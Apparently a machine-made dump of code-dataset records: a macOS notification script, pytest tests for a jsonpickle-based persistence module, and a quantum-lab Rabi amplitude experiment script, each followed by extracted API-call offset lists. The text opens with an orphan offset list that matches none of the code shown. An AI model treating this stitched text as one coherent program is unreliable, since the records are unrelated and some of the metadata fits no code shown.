[((3143, 3206), 'numpy.abs', 'np.abs', (['(self.current_lims[dimx][1] - self.current_lims[dimx][0])'], {}), '(self.current_lims[dimx][1] - self.current_lims[dimx][0])\n', (3149, 3206), True, 'import numpy as np\n'), ((3220, 3283), 'numpy.abs', 'np.abs', (['(self.current_lims[dimy][1] - self.current_lims[dimy][0])'], {}), '(self.current_lims[dimy][1] - self.current_lims[dimy][0])\n', (3226, 3283), True, 'import numpy as np\n'), ((3300, 3346), 'numpy.abs', 'np.abs', (['(self.current_lims[dimx] - xylims[dimx])'], {}), '(self.current_lims[dimx] - xylims[dimx])\n', (3306, 3346), True, 'import numpy as np\n'), ((3368, 3414), 'numpy.abs', 'np.abs', (['(self.current_lims[dimy] - xylims[dimy])'], {}), '(self.current_lims[dimy] - xylims[dimy])\n', (3374, 3414), True, 'import numpy as np\n'), ((1610, 1676), 'numpy.array', 'np.array', (['[self.current_lims[dims[1]], self.current_lims[dims[0]]]'], {}), '([self.current_lims[dims[1]], self.current_lims[dims[0]]])\n', (1618, 1676), True, 'import numpy as np\n')]
|
import Foundation
import objc
import AppKit
import sys
NSUserNotificationCenter = objc.lookUpClass('NSUserNotificationCenter')
NSUserNotification = objc.lookUpClass('NSUserNotification')
def notify(title, subtitle, info_text, delay=0, sound=False, userInfo={}):
notification = NSUserNotification.alloc().init()
notification.setTitle_(title)
notification.setSubtitle_(subtitle)
notification.setInformativeText_(info_text)
notification.setUserInfo_(userInfo)
notification.setHasActionButton_(True)
notification.setActionButtonTitle_('Action!!')
notification.setHasReplyButton_(True)
if sound:
notification.setSoundName_("NSUserNotificationDefaultSoundName")
notification.setDeliveryDate_(Foundation.NSDate.dateWithTimeInterval_sinceDate_(delay, Foundation.NSDate.date()))
NSUserNotificationCenter.defaultUserNotificationCenter().scheduleNotification_(notification)
|
[
"objc.lookUpClass",
"Foundation.NSDate.date"
] |
[((83, 127), 'objc.lookUpClass', 'objc.lookUpClass', (['"""NSUserNotificationCenter"""'], {}), "('NSUserNotificationCenter')\n", (99, 127), False, 'import objc\n'), ((149, 187), 'objc.lookUpClass', 'objc.lookUpClass', (['"""NSUserNotification"""'], {}), "('NSUserNotification')\n", (165, 187), False, 'import objc\n'), ((793, 817), 'Foundation.NSDate.date', 'Foundation.NSDate.date', ([], {}), '()\n', (815, 817), False, 'import Foundation\n')]
|
import json
import pathlib
import datetime as dt
from io import StringIO
import jsonpickle
import pytest
from tellus import __version__
from tellus.configuration import TELLUS_GO, TELLUS_INTERNAL
from tellus.persistence import (
PickleFilePersistor,
TELLUS_SAVE_DIR,
PersistenceSetupException,
PERSISTOR_HEADER_KEY,
PERSISTOR_HEADER_VERSION,
PERSISTOR_HEADER_SAVED,
PERSISTOR_HEADER_SAVE_COUNTS,
)
from tellus.persistable import ZAuditInfo, Persistable
# pylint: disable=unused-argument
# pylint gets cranky about the fake file system fixtures
from tellus.tell import Tell
TELLUS_PICKLE_SAVE_FILE_NO_HEADER = """{"_alias": "tellus", "_categories": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": ["tellus-go"]}, null]}]}, "_go_url": "/tellus", "_tags": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": []}, null]}]}, "py/object": "tellus.tells.Tell"}
{"_alias": "vfh", "_categories": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": ["tellus-go"]}, null]}]}, "_go_url": "http://veryfinehat.com", "_tags": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": []}, null]}]}, "py/object": "tellus.tells.Tell"}
{"_alias": "a", "_categories": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": ["tellus-go"]}, null]}]}, "_go_url": "BORKED", "_tags": {"py/reduce": [{"py/type": "sortedcontainers.sortedset.SortedSet"}, {"py/tuple": [{"py/set": []}, null]}]}, "py/object": "tellus.tells.Tell"}"""
TELLUS_PICKLE_SAVE_FILE_WITH_EARLIER_HEADER = f"""{{"persistor": "PickleFilePersistor","tellus-version": "{__version__}"}}
{TELLUS_PICKLE_SAVE_FILE_NO_HEADER}
"""
PERSISTENCE_DATA = ""
PERSISTENCE_TEST_USER = "persistenceTest"
def create_current_save_file():
"""
:return: a string that looks like a current, valid save file, whatever we are using
"""
persistor = PickleFilePersistor(
persist_root=None, save_file_name="current_pickle", testing=True,
)
buffer = StringIO()
persistor.write_save_file(
buffer,
[
Tell("tellus", go_url="/tellus", category=TELLUS_GO),
Tell("vfh", go_url="http://veryfinehat.com", category=TELLUS_GO),
Tell("quislet", category=TELLUS_INTERNAL),
],
)
return buffer.getvalue()
class MiniPersistable(Persistable):
def __init__(self, values=None):
super().__init__(PERSISTENCE_TEST_USER)
self.values = values
def to_json_pickle(self):
return jsonpickle.encode(self)
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.__dict__ == other.__dict__
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
class MiniHolder(object):
def __init__(self):
self.persistables = []
def load_me(self, load_string):
self.persistables.append(jsonpickle.decode(load_string))
def test_persist_no_root(fs):
persistor = PickleFilePersistor(persist_root=None, save_file_name="test")
assert persistor.persistence_file() == pathlib.Path.cwd() / TELLUS_SAVE_DIR / "test"
def test_persistence_file_name(fs):
try:
PickleFilePersistor(persist_root=None, save_file_name=None)
pytest.fail("Creating a Persistor with no file name should throw an exception.")
except PersistenceSetupException as exception:
print(exception)
def test_verify_save_file(fs):
persistor = PickleFilePersistor(
persist_root=None, save_file_name="current_pickle", testing=True,
)
buffer = StringIO()
persistor.write_save_file(buffer, [MiniPersistable()])
header = PickleFilePersistor.verify_save_file(StringIO(buffer.getvalue()))
assert len(header) == 4
assert header[PERSISTOR_HEADER_KEY] == "PickleFilePersistor"
assert header[PERSISTOR_HEADER_VERSION] == f"{__version__}"
assert header[PERSISTOR_HEADER_SAVED] is not None
assert header[PERSISTOR_HEADER_SAVE_COUNTS] == 1
assert buffer.tell() > 0
fs.create_file(
"earlier_pickle", contents=TELLUS_PICKLE_SAVE_FILE_WITH_EARLIER_HEADER
)
with open("earlier_pickle", "r") as save_file:
header = PickleFilePersistor.verify_save_file(save_file)
assert header == {
"persistor": "PickleFilePersistor",
"tellus-version": f"{__version__}",
}
assert save_file.tell() > 0
fs.create_file("old_pickle", contents=TELLUS_PICKLE_SAVE_FILE_NO_HEADER)
with open("old_pickle", "r") as save_file:
header = PickleFilePersistor.verify_save_file(save_file)
assert header is None
assert save_file.tell() == 0, "This case should reset the file pointer."
def test_pickle_persistence(fs):
persistor = PickleFilePersistor(
persist_root="/test-location", save_file_name="test-file.txt"
)
persistable = MiniPersistable({"test-key": "test-value"})
items_to_persist = [persistable]
persistor.persist(items_to_persist)
hodor = MiniHolder() # too soon?
persistor.load(hodor.load_me)
loaded = hodor.persistables
assert len(hodor.persistables) == 1, "Should have loaded our one test value"
assert (
persistable.to_json_pickle() == loaded[0].to_json_pickle()
), "Our loaded value should equal our existing persistable."
def test_pickle_persistence_cycle(fs):
persistor = PickleFilePersistor(
persist_root="/test-location", save_file_name="test-file.txt"
)
items_to_persist = [
MiniPersistable({"test-key1": "test-value1"}),
MiniPersistable({"test-key2": "test-value2"}),
MiniPersistable({"test-key3": "test-value3"}),
]
persistor.persist(items_to_persist)
hodor = MiniHolder()
persistor.load(hodor.load_me)
loaded = hodor.persistables
assert len(loaded) == len(items_to_persist)
for persisted, loaded in zip(items_to_persist, loaded):
assert (
persisted == loaded
), f"{persisted.to_json_pickle()} should equal {loaded.to_json_pickle()}"
def test_audit_info():
user = "rjbrande"
now = dt.datetime.now(dt.timezone.utc)
audit_info = ZAuditInfo("rjbrande")
assert audit_info.created_by == user
assert dt.datetime.fromisoformat(audit_info.created) == audit_info.created_datetime
assert audit_info.last_modified_by == user
assert (
audit_info.last_modified == audit_info.created
), "Initially, last_modified should == created"
assert (
audit_info.created_datetime - now
).seconds < 1, "created_datetime should roughly be 'now'"
def test_audit_to_simple_dict_and_json():
audit_info = ZAuditInfo("saturngirl")
audit_info.modified("cosmicboy")
test_dict = audit_info.to_simple_data_dict()
assert test_dict["created_by"] == "saturngirl"
assert test_dict["last_modified_by"] == "cosmicboy"
assert test_dict["created"] == audit_info.created
assert test_dict["last_modified"] == audit_info.last_modified
assert json.dumps(test_dict) == audit_info.to_simple_json()
|
[
"io.StringIO",
"tellus.persistable.ZAuditInfo",
"datetime.datetime.fromisoformat",
"tellus.persistence.PickleFilePersistor.verify_save_file",
"pytest.fail",
"json.dumps",
"jsonpickle.decode",
"tellus.persistence.PickleFilePersistor",
"tellus.tell.Tell",
"pathlib.Path.cwd",
"datetime.datetime.now",
"jsonpickle.encode"
] |
[((2030, 2119), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': 'None', 'save_file_name': '"""current_pickle"""', 'testing': '(True)'}), "(persist_root=None, save_file_name='current_pickle',\n testing=True)\n", (2049, 2119), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((2144, 2154), 'io.StringIO', 'StringIO', ([], {}), '()\n', (2152, 2154), False, 'from io import StringIO\n'), ((3147, 3208), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': 'None', 'save_file_name': '"""test"""'}), "(persist_root=None, save_file_name='test')\n", (3166, 3208), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((3628, 3717), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': 'None', 'save_file_name': '"""current_pickle"""', 'testing': '(True)'}), "(persist_root=None, save_file_name='current_pickle',\n testing=True)\n", (3647, 3717), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((3742, 3752), 'io.StringIO', 'StringIO', ([], {}), '()\n', (3750, 3752), False, 'from io import StringIO\n'), ((4927, 5014), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': '"""/test-location"""', 'save_file_name': '"""test-file.txt"""'}), "(persist_root='/test-location', save_file_name=\n 'test-file.txt')\n", (4946, 5014), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((5555, 5642), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': '"""/test-location"""', 'save_file_name': '"""test-file.txt"""'}), "(persist_root='/test-location', save_file_name=\n 'test-file.txt')\n", (5574, 5642), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((6277, 6309), 'datetime.datetime.now', 'dt.datetime.now', (['dt.timezone.utc'], {}), '(dt.timezone.utc)\n', (6292, 6309), True, 'import datetime as dt\n'), ((6327, 6349), 'tellus.persistable.ZAuditInfo', 'ZAuditInfo', (['"""rjbrande"""'], {}), "('rjbrande')\n", (6337, 6349), False, 'from tellus.persistable import ZAuditInfo, Persistable\n'), ((6826, 6850), 'tellus.persistable.ZAuditInfo', 'ZAuditInfo', (['"""saturngirl"""'], {}), "('saturngirl')\n", (6836, 6850), False, 'from tellus.persistable import ZAuditInfo, Persistable\n'), ((2656, 2679), 'jsonpickle.encode', 'jsonpickle.encode', (['self'], {}), '(self)\n', (2673, 2679), False, 'import jsonpickle\n'), ((3354, 3413), 'tellus.persistence.PickleFilePersistor', 'PickleFilePersistor', ([], {'persist_root': 'None', 'save_file_name': 'None'}), '(persist_root=None, save_file_name=None)\n', (3373, 3413), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((3422, 3507), 'pytest.fail', 'pytest.fail', (['"""Creating a Persistor with no file name should throw an exception."""'], {}), "('Creating a Persistor with no file name should throw an exception.'\n )\n", (3433, 3507), False, 'import pytest\n'), ((4358, 4405), 'tellus.persistence.PickleFilePersistor.verify_save_file', 'PickleFilePersistor.verify_save_file', (['save_file'], {}), '(save_file)\n', (4394, 4405), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((4717, 4764), 'tellus.persistence.PickleFilePersistor.verify_save_file', 'PickleFilePersistor.verify_save_file', (['save_file'], {}), '(save_file)\n', (4753, 4764), False, 'from tellus.persistence import PickleFilePersistor, TELLUS_SAVE_DIR, PersistenceSetupException, PERSISTOR_HEADER_KEY, PERSISTOR_HEADER_VERSION, PERSISTOR_HEADER_SAVED, PERSISTOR_HEADER_SAVE_COUNTS\n'), ((6403, 6448), 'datetime.datetime.fromisoformat', 'dt.datetime.fromisoformat', (['audit_info.created'], {}), '(audit_info.created)\n', (6428, 6448), True, 'import datetime as dt\n'), ((7177, 7198), 'json.dumps', 'json.dumps', (['test_dict'], {}), '(test_dict)\n', (7187, 7198), False, 'import json\n'), ((2224, 2276), 'tellus.tell.Tell', 'Tell', (['"""tellus"""'], {'go_url': '"""/tellus"""', 'category': 'TELLUS_GO'}), "('tellus', go_url='/tellus', category=TELLUS_GO)\n", (2228, 2276), False, 'from tellus.tell import Tell\n'), ((2290, 2354), 'tellus.tell.Tell', 'Tell', (['"""vfh"""'], {'go_url': '"""http://veryfinehat.com"""', 'category': 'TELLUS_GO'}), "('vfh', go_url='http://veryfinehat.com', category=TELLUS_GO)\n", (2294, 2354), False, 'from tellus.tell import Tell\n'), ((2368, 2409), 'tellus.tell.Tell', 'Tell', (['"""quislet"""'], {'category': 'TELLUS_INTERNAL'}), "('quislet', category=TELLUS_INTERNAL)\n", (2372, 2409), False, 'from tellus.tell import Tell\n'), ((3067, 3097), 'jsonpickle.decode', 'jsonpickle.decode', (['load_string'], {}), '(load_string)\n', (3084, 3097), False, 'import jsonpickle\n'), ((3253, 3271), 'pathlib.Path.cwd', 'pathlib.Path.cwd', ([], {}), '()\n', (3269, 3271), False, 'import pathlib\n')]
|
# -*- coding: utf-8 -*-
"""
Measure Rabi oscillation by changing the amplitude of the control pulse.
The control pulse has a sin^2 envelope, while the readout pulse is square.
"""
import ast
import math
import os
import time
import h5py
import numpy as np
from numpy.typing import ArrayLike
from mla_server import set_dc_bias
from presto.hardware import AdcFSample, AdcMode, DacFSample, DacMode
from presto import pulsed
from presto.utils import get_sourcecode, sin2
class RabiAmp:
def __init__(
self,
readout_freq: float,
control_freq: float,
readout_port: int,
control_port: int,
readout_amp: float,
readout_duration: float,
control_duration: float,
sample_duration: float,
sample_port: int,
control_amp_arr: ArrayLike,
wait_delay: float,
readout_sample_delay: float,
num_averages: int,
jpa_params=None,
):
self.readout_freq = readout_freq
self.control_freq = control_freq
self.readout_port = readout_port
self.control_port = control_port
self.readout_amp = readout_amp
self.readout_duration = readout_duration
self.control_duration = control_duration
self.sample_duration = sample_duration
self.sample_port = sample_port
self.control_amp_arr = control_amp_arr
self.wait_delay = wait_delay
self.readout_sample_delay = readout_sample_delay
self.num_averages = num_averages
self.rabi_n = len(control_amp_arr)
self.t_arr = None # replaced by run
self.store_arr = None # replaced by run
self.jpa_params = jpa_params
def run(
self,
presto_address,
presto_port=None,
ext_ref_clk=False,
):
# Instantiate interface class
with pulsed.Pulsed(
address=presto_address,
port=presto_port,
ext_ref_clk=ext_ref_clk,
adc_mode=AdcMode.Mixed,
adc_fsample=AdcFSample.G2,
dac_mode=[DacMode.Mixed42, DacMode.Mixed02, DacMode.Mixed02, DacMode.Mixed02],
dac_fsample=[DacFSample.G10, DacFSample.G6, DacFSample.G6, DacFSample.G6],
) as pls:
pls.hardware.set_adc_attenuation(self.sample_port, 0.0)
pls.hardware.set_dac_current(self.readout_port, 32_000)
pls.hardware.set_dac_current(self.control_port, 32_000)
pls.hardware.set_inv_sinc(self.readout_port, 0)
pls.hardware.set_inv_sinc(self.control_port, 0)
pls.hardware.configure_mixer(
freq=self.readout_freq,
in_ports=self.sample_port,
out_ports=self.readout_port,
sync=False, # sync in next call
)
pls.hardware.configure_mixer(
freq=self.control_freq,
out_ports=self.control_port,
sync=True, # sync here
)
if self.jpa_params is not None:
pls.hardware.set_lmx(self.jpa_params['jpa_pump_freq'], self.jpa_params['jpa_pump_pwr'])
set_dc_bias(self.jpa_params['jpa_bias_port'], self.jpa_params['jpa_bias'])
time.sleep(1.0)
# ************************************
# *** Setup measurement parameters ***
# ************************************
# Setup lookup tables for frequencies
pls.setup_freq_lut(
output_ports=self.readout_port,
group=0,
frequencies=0.0,
phases=0.0,
phases_q=0.0,
)
pls.setup_freq_lut(
output_ports=self.control_port,
group=0,
frequencies=0.0,
phases=0.0,
phases_q=0.0,
)
# Setup lookup tables for amplitudes
pls.setup_scale_lut(
output_ports=self.readout_port,
group=0,
scales=self.readout_amp,
)
pls.setup_scale_lut(
output_ports=self.control_port,
group=0,
scales=self.control_amp_arr,
)
# Setup readout and control pulses
# use setup_long_drive to create a pulse with square envelope
# setup_long_drive supports smooth rise and fall transitions for the pulse,
# but we keep it simple here
readout_pulse = pls.setup_long_drive(
output_port=self.readout_port,
group=0,
duration=self.readout_duration,
amplitude=1.0,
amplitude_q=1.0,
rise_time=0e-9,
fall_time=0e-9,
)
# For the control pulse we create a sine-squared envelope,
# and use setup_template to use the user-defined envelope
control_ns = int(round(self.control_duration *
pls.get_fs("dac"))) # number of samples in the control template
control_envelope = sin2(control_ns)
control_pulse = pls.setup_template(
output_port=self.control_port,
group=0,
template=control_envelope,
template_q=control_envelope,
envelope=True,
)
# Setup sampling window
pls.set_store_ports(self.sample_port)
pls.set_store_duration(self.sample_duration)
# ******************************
# *** Program pulse sequence ***
# ******************************
T = 0.0 # s, start at time zero ...
# Control pulse
pls.reset_phase(T, self.control_port)
pls.output_pulse(T, control_pulse)
# Readout pulse starts right after control pulse
T += self.control_duration
pls.reset_phase(T, self.readout_port)
pls.output_pulse(T, readout_pulse)
# Sampling window
pls.store(T + self.readout_sample_delay)
# Move to next Rabi amplitude
T += self.readout_duration
pls.next_scale(T, self.control_port) # every iteration will have a different amplitude
# Wait for decay
T += self.wait_delay
# **************************
# *** Run the experiment ***
# **************************
# repeat the whole sequence `rabi_n` times
# then average `num_averages` times
pls.run(
period=T,
repeat_count=self.rabi_n,
num_averages=self.num_averages,
print_time=True,
)
t_arr, (data_I, data_Q) = pls.get_store_data()
if self.jpa_params is not None:
pls.hardware.set_lmx(0.0, 0.0)
set_dc_bias(self.jpa_params['jpa_bias_port'], 0.0)
self.t_arr = t_arr
self.store_arr = data_I + 1j * data_Q
return self.save()
def save(self, save_filename=None):
# *************************
# *** Save data to HDF5 ***
# *************************
if save_filename is None:
script_path = os.path.realpath(__file__) # full path of current script
current_dir, script_basename = os.path.split(script_path)
script_filename = os.path.splitext(script_basename)[0] # name of current script
timestamp = time.strftime("%Y%m%d_%H%M%S", time.localtime()) # current date and time
save_basename = f"{script_filename:s}_{timestamp:s}.h5" # name of save file
save_path = os.path.join(current_dir, "data", save_basename) # full path of save file
else:
save_path = os.path.realpath(save_filename)
source_code = get_sourcecode(__file__) # save also the sourcecode of the script for future reference
with h5py.File(save_path, "w") as h5f:
dt = h5py.string_dtype(encoding='utf-8')
ds = h5f.create_dataset("source_code", (len(source_code), ), dt)
for ii, line in enumerate(source_code):
ds[ii] = line
for attribute in self.__dict__:
print(f"{attribute}: {self.__dict__[attribute]}")
if attribute.startswith("_"):
# don't save private attributes
continue
if attribute == "jpa_params":
h5f.attrs[attribute] = str(self.__dict__[attribute])
elif np.isscalar(self.__dict__[attribute]):
h5f.attrs[attribute] = self.__dict__[attribute]
else:
h5f.create_dataset(attribute, data=self.__dict__[attribute])
print(f"Data saved to: {save_path}")
return save_path
@classmethod
def load(cls, load_filename):
with h5py.File(load_filename, "r") as h5f:
num_averages = h5f.attrs["num_averages"]
control_freq = h5f.attrs["control_freq"]
readout_freq = h5f.attrs["readout_freq"]
readout_duration = h5f.attrs["readout_duration"]
control_duration = h5f.attrs["control_duration"]
readout_amp = h5f.attrs["readout_amp"]
sample_duration = h5f.attrs["sample_duration"]
# rabi_n = h5f.attrs["rabi_n"]
wait_delay = h5f.attrs["wait_delay"]
readout_sample_delay = h5f.attrs["readout_sample_delay"]
control_amp_arr = h5f["control_amp_arr"][()]
t_arr = h5f["t_arr"][()]
store_arr = h5f["store_arr"][()]
# source_code = h5f["source_code"][()]
# these were added later
try:
readout_port = h5f.attrs["readout_port"]
except KeyError:
readout_port = 0
try:
control_port = h5f.attrs["control_port"]
except KeyError:
control_port = 0
try:
sample_port = h5f.attrs["sample_port"]
except KeyError:
sample_port = 0
try:
jpa_params = ast.literal_eval(h5f.attrs["jpa_params"])
except KeyError:
jpa_params = None
self = cls(
readout_freq,
control_freq,
readout_port,
control_port,
readout_amp,
readout_duration,
control_duration,
sample_duration,
sample_port,
control_amp_arr,
wait_delay,
readout_sample_delay,
num_averages,
jpa_params,
)
self.control_amp_arr = control_amp_arr
self.t_arr = t_arr
self.store_arr = store_arr
return self
def analyze(self, all_plots=False):
if self.t_arr is None:
raise RuntimeError
if self.store_arr is None:
raise RuntimeError
import matplotlib.pyplot as plt
from presto.utils import rotate_opt
ret_fig = []
t_low = 1500 * 1e-9
t_high = 2000 * 1e-9
# t_span = t_high - t_low
idx_low = np.argmin(np.abs(self.t_arr - t_low))
idx_high = np.argmin(np.abs(self.t_arr - t_high))
idx = np.arange(idx_low, idx_high)
# nr_samples = len(idx)
if all_plots:
# Plot raw store data for first iteration as a check
fig1, ax1 = plt.subplots(2, 1, sharex=True, tight_layout=True)
ax11, ax12 = ax1
ax11.axvspan(1e9 * t_low, 1e9 * t_high, facecolor="#dfdfdf")
ax12.axvspan(1e9 * t_low, 1e9 * t_high, facecolor="#dfdfdf")
ax11.plot(1e9 * self.t_arr, np.abs(self.store_arr[0, 0, :]))
ax12.plot(1e9 * self.t_arr, np.angle(self.store_arr[0, 0, :]))
ax12.set_xlabel("Time [ns]")
fig1.show()
ret_fig.append(fig1)
# Analyze Rabi
resp_arr = np.mean(self.store_arr[:, 0, idx], axis=-1)
data = rotate_opt(resp_arr)
# Fit data
popt_x, perr_x = _fit_period(self.control_amp_arr, np.real(data))
period = popt_x[3]
period_err = perr_x[3]
pi_amp = period / 2
pi_2_amp = period / 4
print("Tau pulse amplitude: {} +- {} FS".format(period, period_err))
print("Pi pulse amplitude: {} +- {} FS".format(pi_amp, period_err / 2))
print("Pi/2 pulse amplitude: {} +- {} FS".format(pi_2_amp, period_err / 4))
if all_plots:
fig2, ax2 = plt.subplots(4, 1, sharex=True, figsize=(6.4, 6.4), tight_layout=True)
ax21, ax22, ax23, ax24 = ax2
ax21.plot(self.control_amp_arr, np.abs(data))
ax22.plot(self.control_amp_arr, np.angle(data))
ax23.plot(self.control_amp_arr, np.real(data))
ax23.plot(self.control_amp_arr, _func(self.control_amp_arr, *popt_x), '--')
ax24.plot(self.control_amp_arr, np.imag(data))
ax21.set_ylabel("Amplitude [FS]")
ax22.set_ylabel("Phase [rad]")
ax23.set_ylabel("I [FS]")
ax24.set_ylabel("Q [FS]")
ax2[-1].set_xlabel("Pulse amplitude [FS]")
fig2.show()
ret_fig.append(fig2)
data_max = np.abs(data).max()
unit = ""
mult = 1.0
if data_max < 1e-6:
unit = "n"
mult = 1e9
elif data_max < 1e-3:
unit = "μ"
mult = 1e6
elif data_max < 1e0:
unit = "m"
mult = 1e3
fig3, ax3 = plt.subplots(tight_layout=True)
ax3.plot(self.control_amp_arr, mult * np.real(data), '.')
ax3.plot(self.control_amp_arr, mult * _func(self.control_amp_arr, *popt_x), '--')
ax3.set_ylabel(f"I quadrature [{unit:s}FS]")
ax3.set_xlabel("Pulse amplitude [FS]")
fig3.show()
ret_fig.append(fig3)
return ret_fig
def _func(t, offset, amplitude, T2, period, phase):
frequency = 1 / period
return offset + amplitude * np.exp(-t / T2) * np.cos(math.tau * frequency * t + phase)
def _fit_period(x: list[float], y: list[float]) -> tuple[list[float], list[float]]:
from scipy.optimize import curve_fit
# from scipy.optimize import least_squares
pkpk = np.max(y) - np.min(y)
offset = np.min(y) + pkpk / 2
amplitude = 0.5 * pkpk
T2 = 0.5 * (np.max(x) - np.min(x))
freqs = np.fft.rfftfreq(len(x), x[1] - x[0])
fft = np.fft.rfft(y)
frequency = freqs[1 + np.argmax(np.abs(fft[1:]))]
period = 1 / frequency
first = (y[0] - offset) / amplitude
if first > 1.:
first = 1.
elif first < -1.:
first = -1.
phase = np.arccos(first)
p0 = (
offset,
amplitude,
T2,
period,
phase,
)
res = curve_fit(_func, x, y, p0=p0)
popt = res[0]
pcov = res[1]
perr = np.sqrt(np.diag(pcov))
offset, amplitude, T2, period, phase = popt
return popt, perr
# def _residuals(p, x, y):
# offset, amplitude, T2, period, phase = p
# return _func(x, offset, amplitude, T2, period, phase) - y
# res = least_squares(_residuals, p0, args=(x, y))
# # offset, amplitude, T2, period, phase = res.x
# return res.x, np.zeros_like(res.x)
if __name__ == "__main__":
WHICH_QUBIT = 2 # 1 (higher resonator) or 2 (lower resonator)
USE_JPA = False
WITH_COUPLER = False
# Presto's IP address or hostname
# ADDRESS = "172.16.17.32"
# PORT = 42874
ADDRESS = "127.0.0.1"
PORT = 7878
EXT_REF_CLK = False # set to True to lock to an external reference clock
jpa_bias_port = 1
if WHICH_QUBIT == 1:
if WITH_COUPLER:
readout_freq = 6.167_009 * 1e9 # Hz, frequency for resonator readout
control_freq = 3.556_520 * 1e9 # Hz
else:
readout_freq = 6.166_600 * 1e9 # Hz, frequency for resonator readout
control_freq = 3.557_866 * 1e9 # Hz
control_port = 3
jpa_pump_freq = 2 * 6.169e9 # Hz
jpa_pump_pwr = 11 # lmx units
jpa_bias = +0.437 # V
elif WHICH_QUBIT == 2:
if WITH_COUPLER:
readout_freq = 6.029_130 * 1e9 # Hz, frequency for resonator readout
control_freq = 4.093_042 * 1e9 # Hz
else:
readout_freq = 6.028_450 * 1e9 # Hz, frequency for resonator readout
control_freq = 4.093_372 * 1e9 # Hz
control_port = 4
jpa_pump_freq = 2 * 6.031e9 # Hz
jpa_pump_pwr = 9 # lmx units
jpa_bias = +0.449 # V
else:
raise ValueError
# cavity drive: readout
readout_amp = 0.4 # FS
readout_duration = 2e-6 # s, duration of the readout pulse
readout_port = 1
# qubit drive: control
control_duration = 20e-9 # s, duration of the control pulse
# cavity readout: sample
sample_duration = 4 * 1e-6 # s, duration of the sampling window
sample_port = 1
# Rabi experiment
num_averages = 1_000
rabi_n = 128 # number of steps when changing duration of control pulse
control_amp_arr = np.linspace(0.0, 1.0, rabi_n) # FS, amplitudes for control pulse
wait_delay = 200e-6 # s, delay between repetitions to allow the qubit to decay
readout_sample_delay = 290 * 1e-9 # s, delay between readout pulse and sample window to account for latency
jpa_params = {
'jpa_bias': jpa_bias,
'jpa_bias_port': jpa_bias_port,
'jpa_pump_freq': jpa_pump_freq,
'jpa_pump_pwr': jpa_pump_pwr,
} if USE_JPA else None
rabi = RabiAmp(
readout_freq,
control_freq,
readout_port,
control_port,
readout_amp,
readout_duration,
control_duration,
sample_duration,
sample_port,
control_amp_arr,
wait_delay,
readout_sample_delay,
num_averages,
jpa_params,
)
rabi.run(ADDRESS, PORT, EXT_REF_CLK)
|
[
"presto.pulsed.Pulsed",
"numpy.fft.rfft",
"presto.utils.rotate_opt",
"numpy.abs",
"numpy.angle",
"numpy.imag",
"numpy.mean",
"numpy.arange",
"numpy.exp",
"numpy.diag",
"os.path.join",
"presto.utils.sin2",
"numpy.max",
"numpy.linspace",
"numpy.real",
"mla_server.set_dc_bias",
"numpy.arccos",
"matplotlib.pyplot.subplots",
"time.localtime",
"presto.utils.get_sourcecode",
"h5py.File",
"os.path.realpath",
"h5py.string_dtype",
"scipy.optimize.curve_fit",
"time.sleep",
"numpy.min",
"numpy.cos",
"numpy.isscalar",
"os.path.splitext",
"ast.literal_eval",
"os.path.split"
] |
